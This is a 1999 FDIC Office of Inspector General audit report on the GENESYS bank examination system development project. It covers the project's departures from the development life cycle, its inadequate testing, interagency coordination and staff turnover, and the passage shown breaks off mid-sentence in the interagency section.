b'FOLLOW-ON AUDIT OF FDIC\'S GENERAL EXAMINATION\n    SYSTEM (GENESYS) DEVELOPMENT PROJECT\n\n\n\n               Audit Report No. 99-020\n                  March 31, 1999\n\n\n\n\n              OFFICE OF AUDITS\n\n         OFFICE OF INSPECTOR GENERAL\n\x0c                            TABLE OF CONTENTS\nBACKGROUND                                                                 2\n\nOBJECTIVES, SCOPE, AND METHODOLOGY                                         3\n\nRESULTS OF AUDIT                                                           4\n\nGENESYS DID NOT FOLLOW THE FDIC\'S STRUCTURED\nDEVELOPMENT METHODOLOGY                                                    5\n\n     Feasibility and Cost-Benefit of Alternative Solutions Not Evaluated   6\n\n     Recommendations                                                       8\n\n     Use of Evolutionary Prototyping                                       8\n\n     Recommendations                                                       10\n\n     GENESYS Testing Was Inefficient, Costly, and Not Always Effective     11\n\n     Recommendation                                                        14\n\nBETTER INTERAGENCY COORDINATION NEEDED FOR FUTURE\nGENESYS AUTOMATION EFFORTS                                                 14\n\n     Recommendations                                                       16\n\nNEED FOR CONTINUITY OF EXAMINATION STAFF                                   16\n\n     Recommendations                                                       18\n\nIMPROVED SAFEGUARDS NEEDED TO PROTECT CONFIDENTIAL\nBANK EXAMINATION DATA                                                      18\n\n     Recommendations                                                       21\n\nTRACKING AND REPORTING OF GENESYS COST-BENEFIT\nINFORMATION CAN BE IMPROVED                                                21\n\nCORPORATION COMMENTS AND OIG EVALUATION                                    24\n\nAPPENDIX I - MEMORANDUM: CORPORATION COMMENTS                              28\n\nAPPENDIX II - TABLE: MANAGEMENT RESPONSES TO\nRECOMMENDATIONS                                                            37\n\x0cFederal Deposit Insurance Corporation                                                              Office of Audits\nWashington, D.C. 20434                                                                Office of Inspector General\n\n\n\n   DATE:                 March 31, 1999\n\n   TO:                   Donald C. Demitros, Director, Division of Information Resources\n                         Management and Chief Information Officer\n\n                         James Sexton, Director\n                         Division of Supervision\n\n\n\n   FROM:                 David H. Loewenstein\n                         Assistant Inspector General\n\n   SUBJECT:              Report Entitled Follow-on Audit of FDIC\'s General Examination System\n                         Development Project\n                         (Audit Report No. 99-020)\n\n\n   The Federal Deposit Insurance Corporation (FDIC) Office of Inspector General (OIG) has\n   completed a follow-on audit of the FDIC\'s General Examination System (GENESYS)\n   development project. This follow-on audit focused on evaluating whether developers were\n   adhering to the FDIC\'s system development policies and procedures. Prior to this audit, the OIG\n   issued an audit report entitled Audit of the General Examination System (GENESYS)\n   Development Project dated June 5, 1997 that contained five findings and recommendations\n   designed to improve the FDIC\'s system development practices relative to GENESYS.\n\n   Division of Information Resources Management (DIRM) and Division of Supervision (DOS)\n   management had taken some steps to improve the development practices for GENESYS\n   following our initial audit. However, DIRM repeated its practice of performing detailed design\n   and development work before user requirements had been completely defined or a project work\n   plan had been formally approved. In addition, senior DIRM and DOS management approvals of\n   the GENESYS project work plan, functional requirements document (FRD), and system design\n   document came after significant investments had been made in development work. We also\n   noted that despite significant changes in the project\'s scope, cost, and schedule that should have\n   required a formal re-evaluation of alternatives, the FDIC continued with their initial plan without\n   evaluating alternatives.\n\n   BACKGROUND\n\n   GENESYS represents the FDIC\'s most comprehensive initiative to apply technology to the bank\n   safety and soundness examination process. GENESYS will replace the FDIC\'s Automated\n                                                        2\n\x0cReport of Examination (C-ARE) and WordPerfect\xc2\xae templates used by DOS examiners to\ngenerate the Report of Examination (ROE). GENESYS is intended to improve the quality of the\nROE and the efficiency of the report preparation process by leveraging time saving and data\nintegration features of Windows\xc2\xae 95 and Microsoft\xc2\xae Office 97 software. In addition,\nGENESYS permits the electronic capture and analysis of key bank safety and soundness\nexamination information, such as Call Report and Uniform Bank Performance Report data.\n\nData analysis and query tools contained within GENESYS are intended to assist examiners in\nmore effectively analyzing liquidity risk, interest rate risk, and other risks against which bank\noperations can be assessed. In addition, by expanding the amount of timely and relevant data\navailable to examiners prior to on-site examinations, examiners will be better able to identify the\nspecific risk areas that should be addressed during an examination. GENESYS will also allow\nexaminers to perform additional work off site and should facilitate the work that must be\nperformed on site, thereby reducing the burden of examinations to the industry.\n\nDIRM developed GENESYS using Microsoft Visual Basic\xc2\xae version 5.0 software and various\nadd-on tools, including Formula One\xe2\x84\xa2 and First Impression\xc2\xae. Microsoft Access \xe2\x80\x9897\xc2\xae was\nused to develop the GENESYS database, and Structured Query Language (SQL) program code\nwas used to provide functionality to the GENESYS screens. GENESYS operates on a Pentium-\nbased laptop computer.\n\nThe FDIC initiated the GENESYS project in December 1995. In January 1997, the Board of\nGovernors of the Federal Reserve System (FRS) and the Conference of State Bank Supervisors\n(CSBS) joined the project as part of an interagency effort to develop a single bank safety and\nsoundness examination system. Throughout the project, the FDIC\'s DIRM assumed the lead role\nin developing, testing, and implementing the system. DOS planned to use GENESYS on all new\nsafety and soundness examinations when fully implemented. Approximately 30 state banking\ndepartments planned to begin using GENESYS with the FDIC in 1998, and the majority of the\nremaining state banking departments, along with FRS, planned to implement GENESYS in\nMarch 1999.\n\n\nOBJECTIVES, SCOPE, AND METHODOLOGY\n\nThe objectives of the audit were to determine whether: (1) development was adhering to\nestablished and generally accepted System Development Life Cycle (SDLC) procedures, (2)\nrequirements had been adequately defined and satisfied user needs, and (3) cost and benefit\ninformation had been adequately documented and tracked. Because of the time-sensitive nature\nof the GENESYS development project, we met with DIRM and DOS personnel throughout the\naudit to discuss our preliminary recommendations.\n\nTo accomplish our audit objectives, we interviewed headquarters DIRM and DOS personnel as\nwell as regional and field office bank examiners who were involved with the project. We also\ninterviewed representatives of the U.S. General Accounting Office (GAO), FRS, CSBS, and the\nAlabama State Banking Department. In addition, we reviewed key SDLC deliverable products,\n\n                                                 3\n\x0cincluding the GENESYS project work plan, FRD, and system design document. We also\nreviewed DIRM client information technology (IT) plans, contractor status reports, examiner\ntraining evaluation reports, and other key reports and documents prepared during the GENESYS\ndevelopment process. We also evaluated DIRM and DOS plans and activities relating to System\nQualification Testing (SQT) and User Acceptance Testing (UAT) of GENESYS. Finally, we\nreviewed the FDIC\'s SDLC policies and procedures.\n\nOur audit work was limited to the FDIC\'s development of version 1.0 of GENESYS. We did not\nreview development plans or work relating to ongoing or planned GENESYS enhancements.\nWe conducted our audit between September 1997 and October 1998 in accordance with\ngenerally accepted government auditing standards.\n\n\nRESULTS OF AUDIT\n\nAlthough DIRM and DOS management had taken some steps to improve the development practices\nfor GENESYS following our initial audit, GENESYS development practices continued to deviate\nfrom the structured approach prescribed by the FDIC\xe2\x80\x99s SDLC process. Specifically, DIRM\nemployed an evolutionary prototyping process to develop GENESYS wherein development work\nwas performed before requirements definition and design work were substantially complete. DIRM\nalso initiated a SQT of GENESYS before system development and integration testing had been\ncompleted. In addition, DIRM deviated from the FDIC\'s SDLC process by not evaluating the\nfeasibility or cost-benefit of alternative solutions to the development of GENESYS or finalizing\ncritical SDLC deliverables and obtaining senior management approvals prior to initiating subsequent\nSDLC phases.\n\nDIRM decided to deviate from the FDIC\'s prescribed SDLC procedures in an attempt to meet an\naggressive development schedule for GENESYS. However, these deviations caused several\ninefficiencies in the GENESYS development process and required the FDIC to assume unnecessary\nrisk. For example, ongoing changes to the functionality of GENESYS during the SQT process\nrequired testers to continually revalidate and update test procedures and ultimately prevented the\ntesters from completing a SQT for GENESYS. DIRM also experienced inefficiencies and delays in\nthe testing process by providing SQT testers with outdated GENESYS design specifications. This\nresulted in the development of erroneous test procedures that had to be revised or eliminated during\nthe SQT process. Inadequate system qualification testing also allowed security weaknesses and\nnumerous software bugs in GENESYS to go undetected until after DIRM and DOS began training\nthe FDIC and state examiners on use of the software.\n\nExaminers that we spoke with during our audit field work stated that GENESYS would generally\nsatisfy their requirements for generating a safety and soundness ROE. However, feedback from\nexaminers following GENESYS training indicated that the software contained numerous\nprogramming bugs and was not ready for training or production implementation when FDIC\ninitiated its national training on the system. In our opinion, DIRM and DOS could have limited its\nrisk by postponing GENESYS training and implementation until the software had been thoroughly\ntested and the programming bugs corrected.\n\n                                                 4\n\x0cIn addition, we observed that there was no formal agreement between the FDIC and FRS regarding\nresources to satisfy unique FRS requirements. The FDIC assumed unnecessary risk by performing\ndetailed design and development work without any formal FRS approvals of the GENESYS project\nwork plan, FRD, or system design document. A less-than-expected level of FRS examiner support\nduring the GENESYS design phase and FRS\' decision to temporarily withdraw from the project on\ntwo separate occasions in May 1997 and November 1997 caused inefficiencies during the\ndevelopment process and contributed to delays to the project schedule. We believe that the FDIC\ncan improve its interagency coordination on the many planned enhancements to GENESYS by\nformalizing up-front interagency development agreements and adhering more closely to generally\naccepted SDLC procedures.\n\nSignificant turnover of DOS examiners assigned to the project impeded both requirements definition\nand design and resulted in unnecessary delays to the GENESYS development schedule. In addition,\nwe found that GENESYS security features that were designed to prevent the unauthorized disclosure\nof confidential bank examination information needed to be improved. Finally, we found that there\nwas a need to track and report more complete and up-to-date cost-benefit information on GENESYS\nthroughout its life cycle.\n\nPrior OIG audit reports have identified repeated instances where DIRM has deviated from the\nstructured development approach required by the FDIC\'s SDLC process. For example, in our review\nof the FDIC\'s Time and Attendance Processing System (TAPS) development project, we noted that\nDIRM and Division of Administration (DOA) management did not formally evaluate the feasibility\nor cost-benefit of alternative solutions to TAPS. In addition, DIRM and DOA proceeded with\ndesign and development work before fully defining user requirements. We also noted that TAPS\nsuffered from a high turnover of project staff.\n\nReports and guidelines issued in past years by such organizations as GAO and the Office of\nManagement and Budget (OMB) have identified similar causes for unsuccessful IT and systems\ndevelopment efforts. These causes include an inadequate evaluation of system alternatives, lack of\nsenior management involvement, incomplete knowledge of customer needs, and turnover of key\nproject staff. Because the referenced SDLC deviations continue to recur on DIRM\'s SDLC projects,\nwe are re-addressing several recommendations to DIRM that have been made in past OIG audit\nreports. In addition, we are making several new recommendations to improve DIRM\'s development\npractices on future IT initiatives.\n\n\nGENESYS DID NOT FOLLOW THE FDIC\'S STRUCTURED DEVELOPMENT\nMETHODOLOGY\n\nDIRM and DOS management had taken some steps to improve the development practices for\nGENESYS following our initial audit. For example, DIRM assigned a quality assurance specialist to\nGENESYS and DOS improved the documentation of GENESYS requirements. However,\nGENESYS development practices continued to deviate from the structured approach required by the\nFDIC\xe2\x80\x99s SDLC process. Specifically, DIRM deviated from the FDIC\'s SDLC process by (1) not\nevaluating the feasibility or cost-benefit of alternative solutions to the development of GENESYS,\n\n                                                5\n\x0c(2) using an evolutionary prototyping methodology wherein development work was performed\nbefore requirements definition and design work were substantially complete, and (3) not finalizing\ncritical SDLC deliverables and obtaining formal senior management approvals prior to making\nsignificant investments in subsequent SDLC phases.\n\nDIRM decided to deviate from the FDIC\'s prescribed SDLC procedures in an attempt to meet an\naggressive development schedule for GENESYS. However, these deviations caused several\ninefficiencies in the GENESYS development process and exposed the project to unnecessary risk.\nFor example, DIRM\'s decision to deviate from the phased testing procedures prescribed by the\nFDIC\'s SDLC process resulted in a testing process that was ineffective, costly, and in some cases,\nredundant.\n\nDIRM initiated a SQT of GENESYS before the system had been completely developed. Ongoing\ndevelopment of GENESYS during the SQT process prevented testers from finalizing a SQT plan\nand required ongoing revalidation and updating of SQT procedures to ensure that new or modified\nfunctionality that was being built into GENESYS would be properly tested. In addition, outdated\nGENESYS design specifications provided to the SQT testers prior to the start of SQT resulted in the\ndevelopment of many erroneous test procedures that subsequently had to be revised or eliminated.\nWe noted that the FDIC paid a contractor $491,037 to perform the SQT.\n\nWe advised DIRM and DOS officials of the risks associated with performing a SQT before\ndevelopment and integration testing was completed. However, the DIRM and DOS officials\nindicated that they recognized the risks of performing concurrent testing and proceeded with the\nSQT. The lack of a fully integrated GENESYS system prevented testers from completing a SQT for\nGENESYS. Inadequate system qualification testing also allowed security weaknesses and numerous\nsoftware bugs in GENESYS to go undetected until after DIRM and DOS began training the FDIC\nand state examiners on use of the software.\n\nExaminers that we spoke with during our audit field work stated that GENESYS would generally\nsatisfy their requirements for generating a safety and soundness report of examination.\nHowever, feedback from examiners following GENESYS training indicated that the software\ncontained numerous programming bugs and was not ready for training or production\nimplementation when the FDIC initiated its national training on the system in August 1998. In\nour opinion, DIRM should have delayed GENESYS training and implementation until the\nsoftware had been thoroughly tested and the programming bugs corrected. Initial impressions of\na new software product are lasting ones and can have a significant impact on acceptance of the\nsoftware within the user community. Given the complexity of the GENESYS software, DIRM\ncould have further limited the risk of an unsuccessful implementation by ensuring that\nprogramming bugs were corrected before examiners were trained on the system.\n\n\nFeasibility and Cost-Benefit of Alternative Solutions Not Evaluated\n\nEarlier in the GENESYS development process, DIRM and DOS did not formally evaluate the\nfeasibility or cost-benefit of alternative solutions to GENESYS. DIRM and DOS developed an\n\n                                                 6\n\x0canalysis of the projected costs and benefits of developing GENESYS in September 1996. DIRM\nalso maintained and reported annual cost data throughout most of the project\'s life cycle as changes\noccurred in the project\'s scope. However, the September 1996 analysis did not address alternative\nsolutions. Additionally, despite significant changes in the project\'s scope, cost, and schedule in\nJanuary 1997 that should have required a formal re-evaluation of alternatives, the FDIC continued\nwith their initial plan to develop an in-house system without formally evaluating alternatives.\n\nAlthough DIRM officials informed us that they informally considered alternatives to GENESYS,\nthey did not formally evaluate or document the cost-benefit of alternative solutions because they did\nnot consider it necessary to do so. DIRM and DOS also did not provide senior management with\ninformation that compared actual project cost, schedule, and scope to original projections.\n\nFRS raised concern about the need to evaluate alternative solutions to GENESYS in April 1997 and\ncited this as one of its reasons for a less than full commitment to the project at that time. Alternative\nsolutions should be considered up-front during the project planning phase of a system initiative.\nAlso, when major changes occur that affect the project\'s cost, scope, risks, or timeframes for\nimplementation, alternative solutions should be revisited in order to validate the approach being\nfollowed.\n\nThe purpose of a feasibility study is to provide senior management with: (1) an analysis of the\nproject\'s objectives, requirements, and system concepts; (2) an evaluation of alternative approaches;\nand (3) a recommended approach. The purpose of a cost-benefit analysis (CBA) is to provide\nmanagement with adequate cost and benefit information to analyze and evaluate alternative\napproaches. A CBA should help to determine whether commercial off-the-shelf software is\navailable to address project requirements or whether other technical and functional alternatives, such\nas enhancing or re-engineering existing systems or modifying an existing system developed by\nanother federal entity, are feasible. Because the structures of feasibility studies and CBAs are so\nsimilar, the FDIC\'s SDLC Manual allows them to be combined.\n\nThe FDIC\'s SDLC Manual requires a feasibility study and CBA to be completed for major IT\nprojects before committing full life cycle resources. Federal guidelines also stress the importance of\nfeasibility studies and CBAs. For example, Evaluating Information Technology Investments, a\npractical guide issued jointly by OMB and GAO in November 1995, recommends that management\nevaluate the cost-benefits and risks of IT projects before making significant investments in those\nprojects. Changes proposed by DIRM to the FDIC\'s SDLC Manual would require that CBAs be\nupdated and approved when significant changes occur in a project\'s scope, estimated resources, or\ntimeframes. Updating CBAs throughout a project\'s life cycle is consistent with sound business\npractices and guidelines, including OMB Circular A-130, which prescribes that CBAs be refreshed\nthroughout the life cycle process with up-to-date information to ensure the continued viability of\nsystems prior to and during implementation.\n\nIn a subsequent section of this report, we identify opportunities for DIRM and DOS to improve the\ntracking and reporting of GENESYS cost and benefit information. Tracking accurate, current, and\ncomplete life cycle cost data is critical to measuring performance and making cost-effective\ndecisions on complex IT investments. Full life cycle cost data is also essential for evaluating\n\n                                                   7\n\x0calternatives when significant changes occur in an IT project\'s cost, scope, or schedule. In addition,\nwithout current and up-to-date cost-benefit information, DIRM is unable to conduct effective post-\nimplementation reviews to validate estimated benefits and document effective management practices\nfor broader use.\n\n\nRecommendations\n\nWe recommend that the Director, Division of Information Resources Management:\n\n(1)    Formally evaluate and document the feasibility and cost-benefit of alternative solutions for\n       systems development projects, including major enhancements to GENESYS, using the\n       guidelines in the FDIC\'s SDLC Manual before committing significant life cycle resources to\n       a particular alternative.\n\n(2)    Revisit alternative solutions when significant scope, cost, risk, or schedule changes occur on\n       future information technology projects.\n\n(3)    Revise the FDIC\'s SDLC Manual to require that as significant changes occur in a project\'s\n       scope, risk, estimated resources, or timeframes, that these changes be approved by the IT\n       Council.\n\n\nUse of Evolutionary Prototyping\n\nDIRM employed an evolutionary prototyping methodology to develop GENESYS that significantly\ndeviated from the phased development methodology prescribed by the FDIC\xe2\x80\x99s SDLC process. The\nevolutionary prototyping methodology used for GENESYS was one in which development work\nwas performed before requirements definition and design work were substantially complete.\nDIRM\'s development approach also involved initiating a SQT of GENESYS before system\ndevelopment and integration testing had been completed. In addition, although the GENESYS\nproject team had developed several draft versions of critical SDLC deliverable products, these\ndeliverables were not approved by senior management before significant investments had been made\nin subsequent life cycle phases. The FDIC\'s SDLC process requires that critical SDLC deliverable\nproducts be approved by senior management before making significant investments in subsequent\nlife cycle phases. DIRM decided to deviate from the FDIC\'s prescribed SDLC process in an attempt\nto meet an aggressive development schedule for GENESYS. However, these deviations caused\nseveral inefficiencies in the GENESYS development process and required the FDIC to assume\nunnecessary risk.\n\nWe spoke with members of the GENESYS development team and learned that the phased\ndevelopment approach prescribed by the FDIC\'s SDLC process was not being followed because of\nthe amount of time required to complete work in one phase before proceeding with work in a\nsubsequent phase. The GENESYS developers adopted a streamlined development process for\nGENESYS in an attempt to meet an aggressive development schedule for the project. The\n\n                                                 8\n\x0cGENESYS project work plan states: "This project is schedule-driven; the highest priority identified\nis to deliver a product on time. Therefore, risk areas that adversely impact project schedule will be\ngiven the highest priority. Other risk areas, such as product content and quality, and project cost,\nwill be considered secondary."\n\nThe evolutionary prototyping methodology used to develop GENESYS was one in which\nprogrammers periodically met with examiners to present specific screens and demonstrate\nfunctionality. Some program code was developed as part of this process to display information on\nthe screen and demonstrate functionality. Based on their meetings with the examiners, the\nprogrammers made adjustments and enhancements to the GENESYS screens. Code reviews were\nalso performed to ensure that detailed design and development work adhered to agreed upon\nstandards. This process was repeated until the user was satisfied with the functionality of the screen.\nOnce the user was satisfied, the DIRM and program office project managers formally approved the\nrequirements and design of the screen and any coding work remaining for the screen was completed.\nThe prototype screen was then integrated into a working version of the application and later tested in\npreparation for production implementation.\n\nThe FDIC\xe2\x80\x99s SDLC Manual describes a prototyping technique that can be used by system developers\nfor requirements gathering or for proof-of-concept purposes. According to the FDIC\'s SDLC\nmethodology, a prototype of the proposed system is developed based on user requirements and\nrefined based on user input. Once the user is satisfied that the prototype has the required features,\nthe prototype requirements are documented in a FRD and design continues in the traditional, phased\nmanner. The prototyping methodology described in the FDIC\'s SDLC Manual has been advocated\nas a useful software engineering tool because it lends itself to intense interaction between users and\ndevelopers, resulting in early validation of requirements. Validation of requirements early in a\nsystem\'s life cycle development is important because failure to validate requirements can result in\nfrequent and expensive changes in later life cycle phases.\n\nWhile it may be necessary to perform a certain level of design and development work to produce a\nworking model or prototype, the design and development work performed on GENESYS was more\nextensive for some business functions than required to validate user requirements and elicit feedback\non the look and feel of the user interface. For example, programmers were developing and testing\nprogram code for GENESYS screen functionality, performing detailed design and development\nwork on the GENESYS database, and developing program code to populate tables in certain\nGENESYS modules.\n\nGENESYS design and development work was performed before required SDLC deliverable\nproducts had been approved. We noted that DIRM and DOS had invested significant corporate\nresources in the GENESYS project before obtaining senior DIRM and DOS management approval\nof a FRD or project work plan describing the scope, resources, and time schedules required to\ndevelop the system. The FDIC\xe2\x80\x99s SDLC Manual prescribes that a project work plan and FRD be\ncompleted and approved before proceeding with detailed design and development work.\n\nWe believe that DIRM\'s use of evolutionary prototyping to develop GENESYS caused certain\ninefficiencies in the GENESYS development process and required the FDIC to assume unnecessary\n\n                                                  9\n\x0crisk. For example, in the following section of this report, we explain that DIRM lost valuable\nresources by proceeding with a SQT of GENESYS before system development and integration\ntesting had been completed. The FDIC\'s SDLC Manual prescribes a phased approach for systems\ndevelopment wherein development is completed before testing begins. In addition, a major risk in\ndeveloping significant functionality into a prototype is that if business requirements change or do not\nreceive management approval, the investment in the design and development of prototype modules\nmay not benefit the project or the Corporation.\n\nDIRM\'s use of evolutionary prototyping also made the project sensitive to personnel turnover.\nDIRM relied on extensive developer/user interaction to build requirements and design into a\nworking software prototype while placing less emphasis on maintaining up-to-date requirements and\ndesign documentation than prescribed by the FDIC\'s SDLC process. As a result, as examiners left\nthe GENESYS project, so did much of the knowledge and rationale underlying why decisions\nrelating to GENESYS requirements and design were made. Although DOS examination staff\nimproved GENESYS user documentation during late 1997 and early 1998, in part, to mitigate the\nimpact of examiner departures, temporary assignments of examination staff to the GENESYS\nproject continued through the close of our audit field work.\n\nIn our opinion, the evolutionary prototyping methodology used to develop GENESYS should not be\nused on the FDIC\'s large, complex systems initiatives, such as GENESYS. In addition, we believe\nthat prototyping techniques should be strictly limited to the requirements gathering phase of IT\nprojects as prescribed by the FDIC\'s SDLC Manual. Evolutionary prototyping that extends beyond\nthe requirements definition phase, similar to the methodology used on GENESYS, may be useful on\nFDIC\'s small, non-complex systems initiatives that involve short development schedules. If DIRM\ndetermines that an evolutionary prototyping methodology similar to the one used on GENESYS is\nappropriate for select, small scale IT initiatives, then the FDIC\'s SDLC Manual should be amended\nto describe the evolutionary prototyping methodology that will be used. The Manual should also\ninclude specific criteria for determining when evolutionary prototyping development such as the one\nused for GENESYS is appropriate. The criteria restricting when this method can be used should\naddress the estimated life cycle cost of the system, time frames for development, project complexity,\nscope, and risk.\n\n\nRecommendations\n\nWe recommend that the Director, Division of Information Resources Management:\n\n(4)    Require the GENESYS development team to follow the phased development process\n       prescribed by the FDIC\'s SDLC Manual for systems development projects, including any\n       major enhancements to GENESYS.\n\n(5)    Determine whether evolutionary prototyping could benefit FDIC\'s small, non-complex\n       systems initiatives that involve short development schedules. If DIRM determines that\n       evolutionary prototyping is appropriate for select, small scale IT initiatives, then the FDIC\'s\n\n\n                                                  10\n\x0c       SDLC Manual should be amended to describe the type of methodology that will be used and\n       specific criteria governing its use.\n\n\nGENESYS Testing Was Inefficient, Costly, and Not Always Effective\n\nDIRM did not follow an efficient or effective method of testing GENESYS prior to its\nimplementation. As a result, valuable system development resources may have been wasted. For\nexample, developers initiated a SQT of GENESYS before system development and integration\ntesting was completed. Although the FDIC paid a contractor $491,037 to perform a SQT for\nGENESYS, ongoing changes to the functionality of GENESYS during the SQT process required\ntesters to continually revalidate and update test procedures. As a result, the SQT was not completed.\n\nDIRM experienced additional inefficiencies in the SQT process by providing testers with outdated\nGENESYS design specifications. This resulted in the development of erroneous test procedures that\nhad to be revised or eliminated during the SQT process. A lack of effective communication and\ncoordination between the SQT testers and members of the GENESYS development and examination\nteams during the SQT process exacerbated the SQT shortcomings. Inadequate system qualification\ntesting allowed security weaknesses and numerous software bugs in GENESYS to go undetected\nuntil after DIRM and DOS began training the FDIC and state examiners on the software.\n\nDIRM assumed additional risk during the testing process by performing a SQT, user acceptance test\n(UAT), and pilot test of GENESYS concurrently. DIRM deviated from the phased testing approach\nprescribed by the FDIC\'s SDLC process in an attempt to meet an aggressive development schedule\nfor GENESYS. We advised DIRM and DOS officials of the risks associated with parallel testing in\nwriting via an e-mail that was sent on May 1, 1998. We also met with DIRM and DOS officials on\nMay 8, 1998 to discuss our concerns regarding parallel testing in greater detail. However, DIRM\nand DOS officials indicated that they recognized the risks of performing parallel testing and\nproceeded with the SQT, UAT, and pilot tests of GENESYS as planned.\n\nIn September 1997, FDIC awarded a contract to provide Independent Verification and Validation\n(IV&V) technical support to the GENESYS project. The contract was valued at $622,149 and ran\nthrough December 31, 1998. The contract required the IV&V contractor to analyze the GENESYS\nfunctional requirements and design, prepare a SQT plan and related test procedures, conduct a SQT,\nand report the results to DIRM. The GENESYS SQT was intended to consist of three 2-week test\ncycles. The first SQT cycle was intended to validate whether the GENESYS functional requirements\nwere met, ensure that all system capabilities functioned as designed, and ensure that the GENESYS\nuser guide was adequate. The second SQT cycle was intended to focus on exception testing to\ndetermine how GENESYS would handle abnormal conditions and error processing. The third SQT\ncycle was intended to repeat the first two SQT cycles using a different set of input data to ensure that\nthere were no data dependencies within the system.\n\nThe IV&V contractor developed its initial test procedures based on a review of the approved\nGENESYS FRD and system design document. However, many of the requirements and design\nspecifications contained within these documents had not been updated to reflect changes that had\n\n                                                  11\n\x0cbeen made to the software\'s functionality pursuant to the evolutionary prototyping process that\nDIRM was using to develop GENESYS. As a result, many of the test procedures that the contractor\ndeveloped were erroneous or inaccurate and had to be revised and revalidated. A lack of effective\ncommunication and coordination between the SQT testers and members of the GENESYS\ndevelopment and examination teams during the SQT process prevented the testers from identifying\nerroneous test procedures. Resources devoted to identifying and revising erroneous test procedures\nintroduced significant inefficiencies to the GENESYS testing process.\n\nThe contractor initiated the first SQT cycle of GENESYS on January 20, 1998. However, the lack\nof a fully integrated GENESYS system and the development of erroneous test procedures referenced\nabove impeded the testing process. We noted that the IV&V contractor was only able to\nsuccessfully execute approximately 14 percent (66 of 471) of the test procedures that had been\nprepared for the first SQT cycle of GENESYS. We also noted that the contractor developed 344\nfindings as a result of the first 2-week SQT cycle for GENESYS. The contractor testers cited the\nlack of a GENESYS user guide, the lack of documentation that explained proper operation of the\nsystem, and an incomplete GENESYS data dictionary as further impediments to the SQT process.\n\nOngoing changes to the functionality of GENESYS during the SQT process introduced additional\ninefficiencies by requiring testers to continually revalidate and update test procedures. In an effort to\naddress this impediment, contractor testers were directed by DIRM on February 3, 1998 to modify\ntheir test procedures based on input from the DOS examiners. Contractor testers were also directed\nto contact the examiners whenever differences were noted between the GENESYS software and\ndocumented requirements and design. During their discussions with examiners, the contractor\ntesters identified new GENESYS requirements and functionality that had been neither documented\nnor coded into the GENESYS software. The examiners indicated that many of these new\nrequirements were needed for an initial release of GENESYS. These new requirements were\nprovided to the GENESYS developers for programming and incorporation into the application.\n\nAlthough the GENESYS SQT process was scheduled to be completed within 6 weeks of its\ninitiation, SQT testing activities continued for 17 weeks and were not completed. In May 1998,\nDIRM discontinued the GENESYS SQT and directed the IV&V contractor to prepare a test analysis\nreport. The SQT test analysis report, dated June 8, 1998 states: "At the time of this report a fully\nintegrated system has not been made available. The testing conducted by the IV&V team might\nmore appropriately be referred to as a combination of unit and integration testing." The test analysis\nreport recommended that the DIRM project manager for GENESYS complete unit and integration\ntesting of the software and then subject the system to a formal SQT. However, at the close of our\nfield work, a formal SQT, as defined by the FDIC\'s SDLC Manual, had not been performed for\nGENESYS.\n\nThe purpose of a SQT is to validate that functional requirements are satisfied by the developed\nsystem and that there are no adverse effects on the overall process or other existing systems. The\nFDIC\'s SDLC Manual describes a SQT as "a comprehensive verification and validation process\nconducted to ensure that all capabilities and requirements of the system are exercised under both\nnormal and stress conditions." SQT procedures cover all facets of a newly developed system,\nincluding screen functionality, database updates, user documentation, and security. In addition, there\n\n                                                  12\n\x0care certain pre-requisites for conducting an effective SQT. These include a fully integrated software\nsystem and completion of unit and integration testing.\n\nThe lack of a formal SQT for GENESYS allowed security weaknesses and numerous software bugs\nin GENESYS to go undetected until after DIRM and DOS began training the FDIC and state\nexaminers on the software. Feedback from examiner training evaluation forms indicated that\nGENESYS was not ready for training or production implementation when DIRM and DOS initiated\nGENESYS training in August 1998 because the software contained run-time errors and numerous\nprogramming bugs. Some examiners suggested in their training evaluation forms that the\nimplementation of GENESYS should be delayed to address the programming bugs that were\nidentified during their training sessions.\n\nIn our opinion, DIRM should have delayed GENESYS training and implementation until the\nsoftware had been thoroughly tested. Emphasis on meeting the GENESYS development schedule\nshould not have obviated requirements to follow prescribed SDLC procedures. Initial impressions of\na new software product are lasting ones and can have a significant impact on acceptance of the\nsoftware within the user community. Training examiners on a software product that has not been\ncompletely tested and still had errors in it presented unnecessary risk to the successful\nimplementation of GENESYS.\n\nDIRM assumed additional risk by deviating from the phased testing approach prescribed by the\nFDIC\'s SDLC process. Specifically, DIRM performed a SQT, UAT, and pilot test of GENESYS in\nparallel. DIRM deviated from the phased testing approach prescribed by the FDIC\'s SDLC process\nin an attempt to meet an aggressive development schedule for GENESYS. However, the FDIC\'s\nSDLC Manual states that the SQT, UAT, and pilot tests are to be performed in a phased manner,\nstarting with the SQT. The SDLC Manual also states that the UAT is the final test of the system and\nthe SQT should be completed before the system is delivered to the UAT team.\n\nPhased testing, as described in the FDIC\'s SDLC Manual, is designed to prevent the inefficiencies\nthat are inherent in parallel testing, such as SQT and UAT testers performing identical test\nprocedures on the same piece of software. In addition, because a SQT had not been completed for\nGENESYS, UAT testers experienced software problems that should have been identified and\ncorrected during the SQT. Although a phased testing approach would most likely have required an\nextension to the GENESYS delivery date, potential efficiencies could have been significant.\n\nWe advised DIRM and DOS officials of the risks associated with concurrent testing on May 1, 1998.\nWe pointed out that the FDIC\'s SDLC Manual prescribes a phased testing approach for newly\ndeveloped systems and that a phased approach would help to ensure a successful implementation of\nGENESYS and acceptance within the user community. We also indicated that, in our opinion, there\nwas unnecessary risk in proceeding with a pilot test of GENESYS, then scheduled to begin May 11,\n1998, without first completing the SQT, followed by the UAT. Despite the concerns expressed by\nour office, DIRM and DOS officials indicated that they recognized the risks of performing\nconcurrent tests and proceeded with the SQT, UAT, and pilot tests as planned.\n\n\n\n                                                 13\n\x0cRecommendation\n\nWe recommend that the Director, Division of Information Resources Management:\n\n(6)    Follow the phased testing approach prescribed by the FDIC\'s SDLC Manual for all future\n       systems development projects and enhancements to existing systems.\n\n\nBETTER INTERAGENCY COORDINATION NEEDED FOR FUTURE GENESYS\nAUTOMATION EFFORTS\n\nAlthough the FDIC and FRS entered into a memorandum of understanding (MOU) establishing a\nsound framework for the development of GENESYS, a lack of adherence to the MOU caused\ninefficiencies and delays in the development process. Specifically, senior FDIC and FRS\nmanagement did not formally approve a project work plan or other agreement defining the\nresponsibilities of each agency on the project or the time and resources to be committed by each\nagency to GENESYS. We noted that the referenced MOU provided for the joint development and\napproval of a project work plan for GENESYS. Generally accepted SDLC principles also require a\nproject work plan to be completed and approved before investing significant resources in life cycle\ndevelopment. The lack of an approved project work plan contributed to delays and inefficiencies\nduring the GENESYS design phase when FRS provided a less than expected level of examiner\nsupport and temporarily withdrew from the project. Additional delays and inefficiencies were\nexperienced during the development phase when FRS temporarily withdrew from the GENESYS\nproject for a second time.\n\nThe 